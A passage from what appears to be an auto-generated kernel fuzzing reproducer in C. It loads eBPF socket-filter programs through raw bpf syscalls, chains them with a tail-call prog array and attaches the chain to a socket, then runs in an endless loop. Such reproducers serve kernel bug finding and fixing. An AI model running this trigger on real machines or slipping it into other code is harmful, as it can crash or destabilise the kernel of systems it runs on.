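        "\xc9\xc6\x36\x85\xa6\xf1\x10\x9d\x2e\xa7\x37\x73\xd3\x63\x5f\x61\x49"
        "\x7f\x1f\xa1\xea\x4a\x16\xf6\x01\x80\x0b\xf3\xe5\x91\x41\xfb\xf0\x5a"
        "\x96\x11\x33\x20\xc4\x45\xf9\xba\x85\x96\x97\x0d\x52\x54\x72\x7e\x80"
        "\x4f\xbd\x99\xcc\xef\xb7\xc0\x92\x69\xdd\x2c\x5c\x25\xe5\x6e\x16\x9a"
        "\xc1\x59\x80\xf3\xf8\x5f\x7c\xa3\x6d\xd5\x95\x0e\xf5\xb6\x4f\xd4\x6f"
        "\x12\x33\x11\x82\x95\x34\xa8\x29\x40\x99\x41\x99\xb3\xcf\x7a\x8f\x09"
        "\xc1\x94\x6e\x55\x28\x9f\x66\x8c\x42\x3f\xcb\xb3\x1a\xe9\x18\x64\xc8"
        "\x82\x31\x31\x51\x74\x1a\x67\x53\x8c\x96\x89\xdc\x8e\xcc\x99\x03\xc7"
        "\x04\x1e\x5c\x07\x04\xe2\xfa\x55\xa7\x56\x48\x75\x17\xa7\x44\x5c\xbd"
        "\x9e\x3f\x51\x75\xe4\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\xbf\x98\xef\xd5\x87\xff\xfe\x32\x6f\x47\x4b\x0b\x08\x9c\x01"
        "\x7b\x16\xc0\x06\x2c\xbc\xe9\x6f\x5a\xde\xbe\xc5\x2a\x79\xf9\x36\x39"
        "\x09\x84\x2f\x79\xc5\x0a\x15\x20\xbe\x46\xd8\x70\x03\x13\x7e\x4c\x50"
        "\x31\xf0\x01\x23\xe8\x12\xa5\xe3\x7c\xd5\x2c\x9e\xb7\x33\x62\x81\xcb"
        "\x8c\x6c\xe9\x93\x4b\x15\x7d\x78\x75\xa7\x0e\xaf\x10\x3c\xb3\x13\x8e"
        "\x23\x61\xc5\x1c\xd1\xea\xb8\xa2\x6b\x23\x2a\xcf\x6b\xf0\xab\x82\x9c"
        "\x26\xda\xb6\x37\x53\x8b\x2e\xb1\x42\x0d\x81\x2d\x2b\x80\xc7\x77\x71"
        "\x0b\xa0\xf1\x8e\x46\x61\x68\x1a\xa2\x18\xd9\xba\x54\x02\x3a\xb4\x30"
        "\x5d\x77\xeb\x15\x61\x1a\xe2\x54\x58\x35\xe9\xd3\x0e\x9f\x6d\x4f\xb4"
        "\x3a\x29\x1c\x69\x54\x5a\x1e\xea\x0f\x87\x20\x43\x11\x32\xd8\x54\x9f"
        "\x99\xbf\x6c\x5c\xb0\x60\xda\x70\xcb\xb5\x9d\x0a\x00\x00\x00\x00\x00"
        "\x34\xd0\x83\xfc\x37\xd2\x44\x9f\x72\xde\x0c\xbe\xa4\xbc\x1d\xc8\x9c"
        "\x13\x6c\xdb\xc5\x04\xf8\x49\xd5\x50\x2d\x77\xa9\x5c\x7b\xff\xf4\xcd"
        "\x9c\x03\x05\x8d\x0d\x4d\x07\xea\x64\x82\x4f\x1a\xcf\x2b\x39\x28\x9f"
        "\x67\x5f\x39\xd0\x17\x19\xcd\xba\xb3\xf1\xce\x10\x60\x9c\x8d\x7b\x3e"
        "\x37\xcb\x99\xb4\x1d\xa5\xe4\x85\xa4\x41\xb6\xa1\x03\x54\x9f\x55\xab"
        "\x09\xdc\x98\x76\x77\x63\xd1\xf2\xfa\xfd\x45\xbb\x7d\x2b\x40\x05\x0d"
        "\x1f\x82\x92\xf4\xd9\xec\x6d\x00\x00\x00\x00\x00\x00\x39\x32\x06\x22"
        "\x90\xf4\x99\x6f\xdd\x55\xb0\x60\x23\x43\x7e\x9e\x20\x72\xda\xf7\xf5"
        "\xd8\x2f\x6f\x1b\x5b\x89\xa4\x11\x34\xf4\xdc\x2e\x65\xbb\x11\x27\x2f"
        "\xdf\x8c\x81\x41\xf4\x1d\x61\x60\xb3\xd8\xb6\xec\xd1\x6d\x14\x26\x7f"
        "\x61\xb4\x88\x1a\xde\xe7\xf0\x7f\x3d\x6a\xf5\xae\x79\xe1\x6f\xe2\xc3"
        "\xf5\x5a\xc7\xa6\x39\x2d\x2e\x1d\x9b\x42\x86\xb6\xc3\xe1\xf5\xa7\x6b"
        "\x85\xed\x6e\x1f\x00\x00\xc6\x7e\x6c\x5f\xcd\xc8\xc3\x93\x81\xbe\x47"
        "\x99\xb8\xcb\x2d\x08\xb8\x26\x2c\x80\x7d\xd7\x55\xe2\x2b\x80\x11\x62"
        "\x38\x1a\xa9\xd1\xaf\x2b\xbc\x9c\xfd\x49\x75\x85\x33\x7e\xac\x40\x8b"
        "\x84\x75\xb4\x7a\x39\x2a\x10\xca\xe3\x49\x16\x0f\x12\x8e\x5f\x87\x3a"
        "\x58\x06\x4e\xb4\x00\xc3\x6a\x90\x62\x4f\x6a\xed\x39\x8a\x21\x5e\x9c"
        "\xe6\x45\x22\xab\x24\x9f\x67\xc3\x8a\x65\x6d\x32\xec\xff\x5c\xdb\x2b"
        "\x03\x9c\x4a\xbf\x34\x9d\x2c\x0f\x88\xa4\x2e\x91\x89\xbb\xfa\x7f\x5c"
        "\xf3\x5b\x6e\x7e\xf8\xf9\xd3\x31\x63\xb7\xea\x87\x55\x0f\xb1\xba\x33"
        "\x4c\x83\xe3\xae\xc4\x71\x4c\x9c\x4c\xa3\xec\xb0\x4f\x27\x20\x23\x76"
        "\x15\xa2\x8b\xf3\x10\xb5\x8f\xfa\x2a\x10\x32\x16\xfd\xcc\x8c\x2d\x8f"
        "\x5d\x55\xe5\xe7\xeb\xf1\x47\x10\x52\x72\xaa\xae\x56\xe8\x6d\x85\x6b"
        "\x3c\xf7\x9a\x3f\x73\x06\x43\x67\x62\xdd\x07\xce\xbc\x78\x92\xec\x6f"
        "\x9f\x69\x6d\xa3\x8f\xee\xd3\xdc\x00\x01\x50\x0e\x34\xad\xae\x1b\xa8"
        "\x9a\x32\xba\xd2\xaf\x90\x30\xf8\x40\xf1\xba\x46\x64\xf3\x55\x47\xcd"
        "\xad\xd5\xcb\xac\xc5\x93\x52\xc2\x90\xf5\x5d\x97\x1b\x65\x95\x35\x33"
        "\x66\x8c\x25\xf2\x1d\x8d\x62\xd8\x49\xe9\x05\x8e\xaa\x97\xc6\x34\x91"
        "\x56\x88\x87\x54\x8f\x66\x8c\xdb\xca\x2a\xbf\x01\xa3\x61\xa0\xb6\x4d"
        "\x8b\x52\x3e\x66\x9d\xa3\x50\xe3\xec\x74\x45\xdf\xbf\x36\x6b\x0b\x3b"
        "\xc5\xe7\x68\x24\xa1\xe4\x3e\xaa\xec\xa7\x0d\xb9\x0f\x2f\xa3\x95\x96"
        "\x44\x34\x47\x67\x19\x33\x07\x9a\x24\xfe\x36\x81\xad\x9a\xc3\x61\xf7"
        "\x1a\xc2\x79\xa6\x88\xf1\x0a\x12\x10\x5e\xde\xbc\x5e\x3b\x8d\xad\x4c"
        "\x83\x05\xab\x12\x9c\xa2\xdf\xb9\xb7\xc5\xe9\xd0\x97\xbd\x01\xb4\x95"
        "\xcc\xce\xfd\xdc\xe5\x69\x11\x7f\x7f\x5d\x6a\x62\x70\xff\x0f\x0f\x4c"
        "\x37\x10\x29\xca\x84\x89\x57\x1b\x55\x84\x1b\xf3\xdd\x00\x3b\xc8\x14"
        "\x60\xee\xe5\x7c\xeb\x3c\x33\xf4\xe9\x30\x0b\x01\x44\xfe\x04\x0c\xf5"
        "\xfc\xfc\xbb\x61\x6c\x20\x70\x23\x78\x81\xaf\xdb\x31\x4c\xec\xd1\x62"
        "\x3f\x3e\x55\xab\x8b\x76\x27\xfa\x1b\xe3\x49\x14\x5a\x8d\x63\x13\xcb"
        "\xc7\x90\xee\xfe\x20\x20\x13\x8e\x82\xfb\x9d\x35\x1b\xe4\xdd\xcb\xcc"
        "\x9b\xc0\x48\xdd\x3d\xb5\x82\x8d\x16\xba\xec\x6e\x07\xa0\x07\xf0\x03"
        "\x0f\x34\xea\x3c\xfd\x52\x4d\x6f\xa1\xd4\x5d\xa5\x64\x1d\x6c\x94\xe1"
        "\xd3\xae\x7f\xba\x1c\x85\x03\x5d\x2a\x60\xef\x16\x96\xe0\xd9\x6a\xa1"
        "\xc6\x00\x19\xf7\x3a\xe0\xaa\x61\x13\xcd\x66\xef\x26\xb5\x77\x73\x37"
        "\xc2\x6e\x14\x61\x40\x5d\x86\xfd\xf0\x91\xed\xd5\x26\xf2\x5c\xad\xa4"
        "\x39\xbb\x36\x09\xed\x5c\x35\xab\x60\xa5\x39\xad\xe7\x86\xbd\x60\x04"
        "\xd0\xea\x3e\xdb\xd6\xc4\xda\x0d\x8e\x8b\xe8\xc7\x71\xc8\xc8\xa0\xb0"
        "\x7d\x98\x59\xe0\x4a\xdb\x18\x96\x4d\xcc\xe9\xbc\xe5\x46\x07\x4c\x26"
        "\xdf\xfb\xc2\xdf\x37\x2a\x01\x6e\x8c\x84\x5d\x42\x57\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x96\x57"
        "\x69\x7d\x9c\x2b\x13\x2b\x2d\xc2\xf5\xea\x51\x22\x83\x65\x82\xa7\xe8"
        "\x5f\xe2\xbc\x16\x6f\x17\xae\xfd\x9d\x86\x1d\xe0\x19\x1f\x52\x77\xd4"
        "\xa3\xb5\xaf\xb6\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\xde\x7f"
        "\x84\x85\xd9\x50\x71\x64\xa1\x87\x22\x0b\x36\xdd\xc7\xfa\x64\x5d\x4b"
        "\xd0\xc1\x41\x4c\x30\xa4\x16",
        3441);
    *(uint64_t*)0x20000090 = 0x20000140;
    memcpy((void*)0x20000140, "GPL\000", 4);
    *(uint32_t*)0x20000098 = 0;
    *(uint32_t*)0x2000009c = 0;
    *(uint64_t*)0x200000a0 = 0;
    *(uint32_t*)0x200000a8 = 0;
    *(uint32_t*)0x200000ac = 0;
    memset((void*)0x200000b0, 0, 16);
    *(uint32_t*)0x200000c0 = 0;
    *(uint32_t*)0x200000c4 = 0;
    *(uint32_t*)0x200000c8 = -1;
    *(uint32_t*)0x200000cc = 8;
    *(uint64_t*)0x200000d0 = 0x20000000;
    *(uint32_t*)0x20000000 = 0;
    *(uint32_t*)0x20000004 = 0;
    *(uint32_t*)0x200000d8 = 0xfffffe89;
    *(uint32_t*)0x200000dc = 0x10;
    *(uint64_t*)0x200000e0 = 0;
    *(uint32_t*)0x200000e8 = 0;
    *(uint32_t*)0x200000ec = 0;
    *(uint32_t*)0x200000f0 = -1;
    *(uint32_t*)0x200000f4 = 0;
    *(uint64_t*)0x200000f8 = 0;
    *(uint64_t*)0x20000100 = 0;
    *(uint32_t*)0x20000108 = 0x10;
    *(uint32_t*)0x2000010c = 0;
    *(uint32_t*)0x20000110 = 0;
    res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000080ul, /*size=*/0x48ul);
    if (res != -1) {
      r[2] = res;
    }
    break;
  case 3:
    // bpf(BPF_MAP_UPDATE_ELEM): map_fd r[1], key 0 (@0x20000000),
    // value r[2] (@0x20000140), flags 0 — installs the first program in
    // slot 0 of the prog array. Dispatched without waiting (see execute_one).
    *(uint32_t*)0x20000200 = r[1];
    *(uint64_t*)0x20000208 = 0x20000000;
    *(uint32_t*)0x20000000 = 0;
    *(uint64_t*)0x20000210 = 0x20000140;
    *(uint32_t*)0x20000140 = r[2];
    *(uint64_t*)0x20000218 = 0;
    syscall(__NR_bpf, /*cmd=*/2ul, /*arg=*/0x20000200ul, /*size=*/0x20ul);
    break;
  case 4:
    // bpf(BPF_PROG_LOAD): prog_type 1 (socket filter), insn_cnt 8,
    // insns @0x20000180 with r[1] patched in at +0x14, license "GPL";
    // r[3] = prog fd. The bytes appear to encode (verify if it matters):
    // ld_imm64 r8=0; ld_imm64 r2=<map fd r[1]> (pseudo-map-fd form);
    // r3=0; call helper 12 (bpf_tail_call); r0=0x20; exit.
    *(uint32_t*)0x20000880 = 1;
    *(uint32_t*)0x20000884 = 8;
    *(uint64_t*)0x20000888 = 0x20000180;
    memcpy((void*)0x20000180,
           "\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
           "\x18\x12\x00\x00",
           20);
    *(uint32_t*)0x20000194 = r[1];
    memcpy(
        (void*)0x20000198,
        "\x00\x00\x00\x00\x00\x00\x00\x00\xb7\x03\x00\x00\x00\x00\x00\x00\x85"
        "\x00\x00\x00\x0c\x00\x00\x00\xb7\x00\x00\x00\x20\x00\x00\x00\x95",
        33);
    *(uint64_t*)0x20000890 = 0x20000980;
    memcpy((void*)0x20000980, "GPL\000", 4);
    *(uint32_t*)0x20000898 = 0;
    *(uint32_t*)0x2000089c = 0;
    *(uint64_t*)0x200008a0 = 0;
    *(uint32_t*)0x200008a8 = 0;
    *(uint32_t*)0x200008ac = 0;
    memset((void*)0x200008b0, 0, 16);
    *(uint32_t*)0x200008c0 = 0;
    *(uint32_t*)0x200008c4 = 0;
    *(uint32_t*)0x200008c8 = -1;
    *(uint32_t*)0x200008cc = 0;
    *(uint64_t*)0x200008d0 = 0;
    *(uint32_t*)0x200008d8 = 0;
    *(uint32_t*)0x200008dc = 0;
    *(uint64_t*)0x200008e0 = 0;
    *(uint32_t*)0x200008e8 = 0;
    *(uint32_t*)0x200008ec = 0;
    *(uint32_t*)0x200008f0 = 0;
    *(uint32_t*)0x200008f4 = 0;
    *(uint64_t*)0x200008f8 = 0;
    *(uint64_t*)0x20000900 = 0;
    *(uint32_t*)0x20000908 = 0;
    *(uint32_t*)0x2000090c = 0;
    *(uint32_t*)0x20000910 = 0;
    res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000880ul, /*size=*/0x90ul);
    if (res != -1) {
      r[3] = res;
    }
    break;
  case 5:
    // setsockopt(r[0], SOL_SOCKET, 0x32 = SO_ATTACH_BPF, &r[3], 4):
    // attach the tail-calling program to the socket so that traffic on it
    // runs the program chain. The optval is written at 0x200000c0, which
    // overwrites part of the case-2 attr (already consumed).
    *(uint32_t*)0x200000c0 = r[3];
    syscall(__NR_setsockopt, /*fd=*/r[0], /*level=*/1, /*optname=*/0x32, /*optval=*/0x200000c0ul, /*optlen=*/4ul);
    break;
  default:
    break;
  }
}

// Map the fixed scratch region used by execute_call(): a PROT_NONE guard
// page below, 16 MiB RWX at 0x20000000, and a guard page above. Then run
// the reproducer loop forever (it never returns normally).
int main(void)
{
  syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1, /*offset=*/0ul);
  use_temporary_dir();
  loop();
  return 0;
}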